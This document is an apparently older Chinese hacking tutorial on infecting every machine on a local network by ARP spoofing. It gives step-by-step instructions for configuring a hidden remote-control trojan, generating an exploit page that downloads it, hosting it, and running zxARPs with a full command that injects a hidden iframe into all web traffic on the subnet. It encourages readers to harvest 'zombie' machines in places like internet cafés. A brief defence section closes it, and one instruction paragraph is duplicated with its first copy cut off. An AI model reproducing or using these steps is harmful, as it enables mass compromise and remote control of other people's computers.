新的掛馬方式 ARP欺騙掛馬稱雄局域網

　　網頁掛馬最難的就是傳播了，小網站易入侵但是訪問人數不多，收獲的肉雞也就不是很多。因此，一種新的掛馬方式開始流行——局域網ARP欺騙掛馬，只要局域網內一台機子中招了，它就可以在內網傳播含有木馬的網頁，捕獲的肉雞就會成幾何增長。

　　局域網ARP欺騙掛馬的好處如下：無需入侵網站，只要你的主機處於局域網中即可，這是它最大的優點;收獲的肉雞多多，短時間內可以收獲數十台甚至上百台肉雞，類似網吧這樣由上百台電腦組成的局域網是最好的掛馬場所;局域網內的用戶訪問任何網站都會中我們的木馬。看了上面的介紹，各位是不是已經蠢蠢欲動了?

　　第一步：配置木馬服務端

　　我們以“黑洞”木馬為例。運行“黑洞”木馬的Client.exe文件，進入Client.exe的主界面後，點擊“文件→創建DLL插入版本服務端程序”。

　　進入服務端程序的創建界面後，首先勾選“Win NT/2000/XP/2003下隱藏服務端文件、注冊表、進程和服務”，然後切換到“連接選項”標簽，在“主機”一欄中填入本機的公網IP地址，端口可以保持默認的“2007”。最後在“連接密碼”處填入用來連接對方的密碼，例如123456(圖1)。設置完成後點擊“生成”按鈕，將木馬服務端保存為muma.exe。

填寫密碼

　　第二步：生成網頁木馬

　　既然是掛馬，那當然缺不了網頁木馬了。這裡我們用“MS07-33網馬生成器”為例。運行“MS07-33網馬生成器”，在“網馬地址”文本框中輸入木馬所在路徑，由於等會我們要自行架設Http服務，所以這裡應該填入“http://192.168.0.2/muma.exe“，其中192.168.0.2是本機在局域網中的IP地址。點擊“生成網馬”按鈕即可生成網馬hackll.htm(圖2)。

點擊“生成網馬”

　　第三步：開啟本機Http服務

　　要讓局域網中的其他主機能夠訪問到我們的網馬，就要開啟本機的Http服務。下載baby web server，這是一款簡單的Web服務器軟件，下載後直接運行，在其主界面中點擊“服務→設置”。

　　將“網頁目錄”設置為網頁木馬所在的地方，例如C盤根目錄“C:“。點“確定”回主界面，然後再點“Start”按鈕開啟本機的Http服務(圖3)。記得要將木馬服務端和網頁木馬放到C盤根目錄。

按鈕開啟本機的Http服務

　　第四步：局域網掛馬

　　最後該請我們的主角出場了，就是上文中提到的小工具，這個工具叫zxARPs，是一個通過ARP欺騙實現局域網掛馬的工具。在使用zxARPs前我們要安裝WinPcap，它是網絡底層驅動包，沒有它zxARPs就運行不了。

　　安裝好後將zxARPs放到任意目錄，然後運行“命令提示符”，進入zxARPs所在的目錄，然後輸入命令：zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert "

　　安裝好後將zxARPs放到任意目錄，然後運行“命令提示符”，進入zxARPs所在的目錄，然後輸入命令：zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert "<iframe src='http://192.168.0.2/hackll.htm' width=0 height=0>"。回車後掛馬就成功了。

　　從現在開始，局域網中的用戶無論訪問什麼網站，都會運行我們的網頁木馬，因為zxARPs在用戶打開網頁的同時已經將掛馬代碼插入到正常網頁中了。

　　ARP掛馬防范技巧

　　從上文可見zxARPs的功能真的十分強大，但它畢竟是基於ARP欺騙原理的，只要局域網內的主機能夠抵御ARP欺騙攻擊，就可以完全無視zxARPs的掛馬方法。

　　網管將局域網內所有的主機的IP地址和MAC地址進行綁定即可搞定。我們也可以下載“360ARP防火牆”來抵御ARP欺騙攻擊(下載地址http://www2.cpcw.com/bzsoft)，安裝完成後點擊界面上的“開啟”按鈕就可以讓它保護我們免受ARP欺騙的攻擊了(圖4)。這時如果有人對你的主機進行ARP欺騙攻擊，我們在可以點擊“記錄”按鈕，查看攻擊者的IP地址。

開啟ARP保護

　　編輯點評：ARP欺騙可以實現多種攻擊效果，本文介紹ARP欺騙掛馬的只是其中的一種攻擊方式，此外還有信息嗅探，主機網絡限制等攻擊方法。可見，ARP欺騙是局域網的頭號大敵。因此我們在平時的安全防范中，不僅要做好本機的安全工作，還要對局域網的安全作一定的防御，這樣才能更安全地使用電腦